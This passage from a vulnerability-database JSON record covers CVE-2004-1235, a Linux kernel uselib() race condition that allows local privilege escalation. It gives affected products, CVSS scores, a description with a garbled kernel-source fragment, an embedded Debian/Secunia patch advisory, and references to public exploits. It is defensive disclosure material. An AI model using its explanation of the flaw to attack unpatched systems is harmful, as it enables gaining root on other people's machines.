                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:1.0:*:desktop:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:ubuntu:ubuntu_linux:4.1:*:ppc:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avaya:intuity_audix:*:*:lx:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_multi_network_firewall:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Paul Starzetz  paul@starzetz.de",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-1235",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 1.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 6.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2004-1235",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 1.9,
            "id": "VHN-9665",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:H/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-1235",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200504-062",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-9665",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2004-1235",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Race condition in the (1) load_elf_library and (2) binfmt_aout function calls for uselib in Linux kernel 2.4 through 2.429-rc2 and 2.6 through 2.6.10 allows local users to execute arbitrary code by manipulating the VMA descriptor. Linux Kernel of (1) load_elf_library() function, (2) binfmt_aout() Functions include brk There is a flaw in the handling of the segment that causes a race condition.root You may get permission. Linux kernel is reported prone to a local privilege-escalation vulnerability. This issue arises in the \u0027uselib()\u0027 functions of the Linux binary-format loader as a result of a race condition. Successful exploitation of this vulnerability can allow a local attacker to gain elevated privileges on a vulnerable computer. \nThe ELF and a.out loaders are reportedly affected by this vulnerability. The Linux kernel provides a binary format loader layer to load programs in different formats such as ELF or a.out or others, and the kernel also provides the sys_uselib() function to load corresponding binary programs. From the analysis of the uselib function of load_elf_library() in the binfmt_elf.c file, there is a problem in the processing of the BRK segment (VMA) of the library. This segment is established through current-\u003emm-\u003emmap_sem. When modifying the memory layout of the calling process\\ \u0027\\\u0027 semaphore \\\u0027\\\u0027 (semaphore) is not maintained, this can be used to mess with memory management and elevate privileges. Part of the source code fs/binfmt_elf.c is as follows: static int load_elf_library(struct file *file) { [904] down_write(\u00a4t-\u003emm-\u003emmap_sem); error = do_mmap(file, ELF_PAGESTART(elf_phdata-\u003ep_vaddr), ( elf_phdata- \u003e p_filesz + ELF_PAGEOFFSET(elf_phdata- \u003e p_vaddr)), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE, (elf_phdata- \u003e p_offset - ELF_PAGEOFFSET(elf_phdata- \u003e p_vaddr))); \u003emmap_sem); if (error != ELF_PAGESTART(elf_phdata-\u003ep_vaddr)) goto out_free_ph;. \n\n----------------------------------------------------------------------\n\nWant to join the Secunia Security Team?\n\nSecunia offers a position as a security specialist, where your daily\nwork involves reverse engineering of software and exploit code,\nauditing of source code, and analysis of vulnerability reports. \n\nhttp://secunia.com/secunia_security_specialist/\n\n----------------------------------------------------------------------\n\nTITLE:\nDebian update for kernel-source-2.4.17\n\nSECUNIA ADVISORY ID:\nSA20338\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/20338/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nExposure of system information, Exposure of sensitive information,\nPrivilege escalation, DoS, System access\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nDebian GNU/Linux 3.0\nhttp://secunia.com/product/143/\n\nDESCRIPTION:\nDebian has issued an update for kernel-source-2.4.17. This fixes some\nvulnerabilities, which can be exploited by malicious, local users to\ngain knowledge of sensitive information, cause a DoS (Denial of\nService), gain escalated privileges, and by malicious people to cause\na DoS, and disclose potentially sensitive information. \n\nFor more information:\nSA10533\nSA11464\nSA11861\nSA11943\nSA13232\nSA13469\nSA13126\nSA13308\nSA13627\nSA13756\nSA13493\nSA13822\nSA14295\nSA14570\nSA13784\n\nSOLUTION:\nApply updated packages. \n\n-- Debian GNU/Linux 3.0 alias woody --\n\nSource archives:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.dsc\nSize/MD5 checksum: 713 6ff55b14d3ae957c55bbed7fabf4c047\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.tar.gz\nSize/MD5 checksum: 30437486 86601103169da686167972e5e560e3d4\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.dsc\nSize/MD5 checksum: 736 f97d95c6ecc26401f8f2fc2ead6cf421\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.tar.gz\nSize/MD5 checksum: 25419305 9bc354f889edd4964840475400b088b7\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.dsc\nSize/MD5 checksum: 800 d20db4ab99e311150734b70519cc31e9\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.tar.gz\nSize/MD5 checksum: 12283 f51a7e01941baca7010fb8c2f0f67fe3\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.dsc\nSize/MD5 checksum: 694 2d48f4cfa4917904b6c1f806ecc1bdb4\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.tar.gz\nSize/MD5 checksum: 491935 94638c0c03b6b163f46319e777d4aa71\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.dsc\nSize/MD5 checksum: 805 b48cbc9c2cd59eee3a52f54cfa5356e0\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.tar.gz\nSize/MD5 checksum: 1150966 6748462e7bce7c917e066e0594d42571\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.dsc\nSize/MD5 checksum: 664 f49e9cba55a8a4b098e5dc522f2a07fc\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.tar.gz\nSize/MD5 checksum: 344642 3a488cc38ffc619bfff4bfbb75eff4cd\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.dsc\nSize/MD5 checksum: 609 4e0f66c1811cfb9e926c21566e55b202\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.tar.gz\nSize/MD5 checksum: 29768549 bc1f8eab880a33bfe2ebeb3ef8b6557a\n\nArchitecture independent components:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.5_all.deb\nSize/MD5 checksum: 24455128 ed5362b12c6327295cd89027ff8e80ab\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.18_all.deb\nSize/MD5 checksum: 24735538 cf9ddb702811464ac2dd2231512053f9\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7_all.deb\nSize/MD5 checksum: 1151866 6f2575f26e7800e1e7a7cafdaf02b3a6\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4_all.deb\nSize/MD5 checksum: 300202 0f5db53cdab20024b4a3a75bd0799b1a\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody4_all.deb\nSize/MD5 checksum: 1708122 7d18878351662289ac0841e0ad8f10f4\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4_all.deb\nSize/MD5 checksum: 23972270 a0bf4a2796a9b49c36579166e6a72d62\n\nHP Precision architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.5_hppa.deb\nSize/MD5 checksum: 3523044 63c790a70164e579c8bb3b8a08ea69b5\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.5_hppa.deb\nSize/MD5 checksum: 2869994 e9e2be22d5fdf40f2e879570adc1132d\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.5_hppa.deb\nSize/MD5 checksum: 3006192 cf53ac718c6ed26a59802e74c5926f00\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.5_hppa.deb\nSize/MD5 checksum: 3029436 d0e0fd747af9ff7a3633ee9cc6b1f1e6\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.5_hppa.deb\nSize/MD5 checksum: 3170356 ca408698a580463da3a547b2f87006e4\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_hppa.deb\nSize/MD5 checksum: 16886 437018078d9d01e25702cf1a20c23414\n\nIntel IA-64 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.18_ia64.deb\nSize/MD5 checksum: 3638280 b6cd4e0d4129b6f4d0734253818cd828\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.18_ia64.deb\nSize/MD5 checksum: 7026800 55e4cd610c06297c7132ce2aeb88d029\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.18_ia64.deb\nSize/MD5 checksum: 7172892 a66f94c18d8ee4354e9446655837c72a\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.18_ia64.deb\nSize/MD5 checksum: 7014470 d99cc0f293c747a295230de934328007\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.18_ia64.deb\nSize/MD5 checksum: 7165570 997a9dbf17821067de6ceb65548e7c2b\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody4_ia64.deb\nSize/MD5 checksum: 21616 1eab80187061fbd304b6328533d7dc33\n\nIBM S/390 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-headers-2.4.17_2.4.17-2.woody.5_s390.deb\nSize/MD5 checksum: 3379418 74817217abf90896eb63d6c6792839fe\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5_s390.deb\nSize/MD5 checksum: 1346190 39433c757763336b6c14bf0d00652596\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_s390.deb\nSize/MD5 checksum: 16404 9cfcf10a2a2ef99bbb009a650cddd227\n\nPowerPC architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-headers-2.4.17-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 3409712 698750e3998ee3792db43f445a8a8d96\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-2.4.17-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 2211146 103890e43508a5913a10ff8be80e9cdc\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 4602 31ef3f45675fc13836337dee97486e20\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 490842 799441a4e49b88f780353d7aff9f29d2\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_powerpc.deb\nSize/MD5 checksum: 16280 4e54c040bc83523d8122287bab6df7a5\n\nBig endian MIPS architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mips.deb\nSize/MD5 checksum: 3523520 45f001c255a3a66f22148d84d035abb1\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody7_mips.deb\nSize/MD5 checksum: 2045436 c840c6ff8c9e3ab455d38021d09a391d\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody7_mips.deb\nSize/MD5 checksum: 2045226 709ccbc6754644fa448c93058f0df504\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mips.deb\nSize/MD5 checksum: 16556 019623b1dbc75bff84d7f056435dc6db\n\nLittle endian MIPS architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 3522422 2118440d1658730fd93f47867848573c\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 2200968 63bc732deee6df19b83f10a50485a476\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 2195278 697eb9b05f765c332eca175284eb24b8\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 17836 61df1f292dccb4e64cb956a629f729fc\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mipsel.deb\nSize/MD5 checksum: 16558 f8382b01aca2c535988b5ab5709dae90\n\nAlpha architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_alpha.deb\nSize/MD5 checksum: 17180 7d1cf8fb24431c01f45fadf7becb6d2e\n\nARM architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_arm.deb\nSize/MD5 checksum: 15878 fcf97ed103c205699fb5396c3a49e293\n\nIntel IA-32 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_i386.deb\nSize/MD5 checksum: 15518 2e7d50090a469a84ef7f3ae8aa97b85f\n\nMotorola 680x0 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_m68k.deb\nSize/MD5 checksum: 15368 41a11620bf7ea34b15742ccf59ff6895\n\nSun Sparc architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_sparc.deb\nSize/MD5 checksum: 18356 71b076d3eeff837bfb54a7f538b11b58\n\nORIGINAL ADVISORY:\nhttp://www.us.debian.org/security/2006/dsa-1082\n\nOTHER REFERENCES:\nSA10533:\nhttp://secunia.com/advisories/10533/\n\nSA11464:\nhttp://secunia.com/advisories/11464/\n\nSA11861:\nhttp://secunia.com/advisories/11861/\n\nSA11943:\nhttp://secunia.com/advisories/11943/\n\nSA13232:\nhttp://secunia.com/advisories/13232/\n\nSA13469:\nhttp://secunia.com/advisories/13469/\n\nSA13126:\nhttp://secunia.com/advisories/13126/\n\nSA13308:\nhttp://secunia.com/advisories/13308/\n\nSA13627:\nhttp://secunia.com/advisories/13627/\n\nSA13756:\nhttp://secunia.com/advisories/13756/\n\nSA13493:\nhttp://secunia.com/advisories/13493/\n\nSA13822:\nhttp://secunia.com/advisories/13822/\n\nSA14295:\nhttp://secunia.com/advisories/14295/\n\nSA14570:\nhttp://secunia.com/advisories/14570/\n\nSA13784:\nhttp://secunia.com/advisories/13784/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "db": "BID",
        "id": "12190"
      },
      {
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "db": "PACKETSTORM",
        "id": "46535"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      }
    ],
    "trust": 2.43
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=744",
        "trust": 0.3,
        "type": "exploit"
      },
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-9665",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2004-1235"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "12190",
        "trust": 2.9
      },
      {
        "db": "NVD",
        "id": "CVE-2004-1235",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "20202",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "20338",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "20162",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "20163",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "13756",
        "trust": 0.8
      },
      {
        "db": "SECTRACK",
        "id": "1012810",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062",
        "trust": 0.7
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2005:017",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2005:043",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2005:016",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2005:092",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1069",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1070",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1082",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1067",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SR:2005:001",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2005-014",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2005-013",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FLSA:2336",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2005:022",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "18800",
        "trust": 0.6
      },
      {
        "db": "TRUSTIX",
        "id": "2005-0001",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2005:930",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20050107 LINUX KERNEL SYS_USELIB LOCAL ROOT VULNERABILITY",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "744",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-62968",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "35641",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "35920",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "778",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "895",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-9665",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2004-1235",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46535",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46873",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46534",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46587",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "db": "BID",
        "id": "12190"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "db": "PACKETSTORM",
        "id": "46535"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ]
  },
  "id": "VAR-200501-0463",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-9665"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:26:36.727000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel_30",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_30.html"
      },
      {
        "title": "RHSA-2005:017",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2005-017.html"
      },
      {
        "title": "RHSA-2005:092",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2005-092.html"
      },
      {
        "title": "RHSA-2005:043",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2005-043.html"
      },
      {
        "title": "RHSA-2005:016",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2005-016.html"
      },
      {
        "title": "TLSA-2005-29",
        "trust": 0.8,
        "url": "http://www.turbolinux.com/security/2005/tlsa-2005-29.txt"
      },
      {
        "title": "RHSA-2005:043",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2005-043j.html"
      },
      {
        "title": "RHSA-2005:016",
        "trust": 0.8,
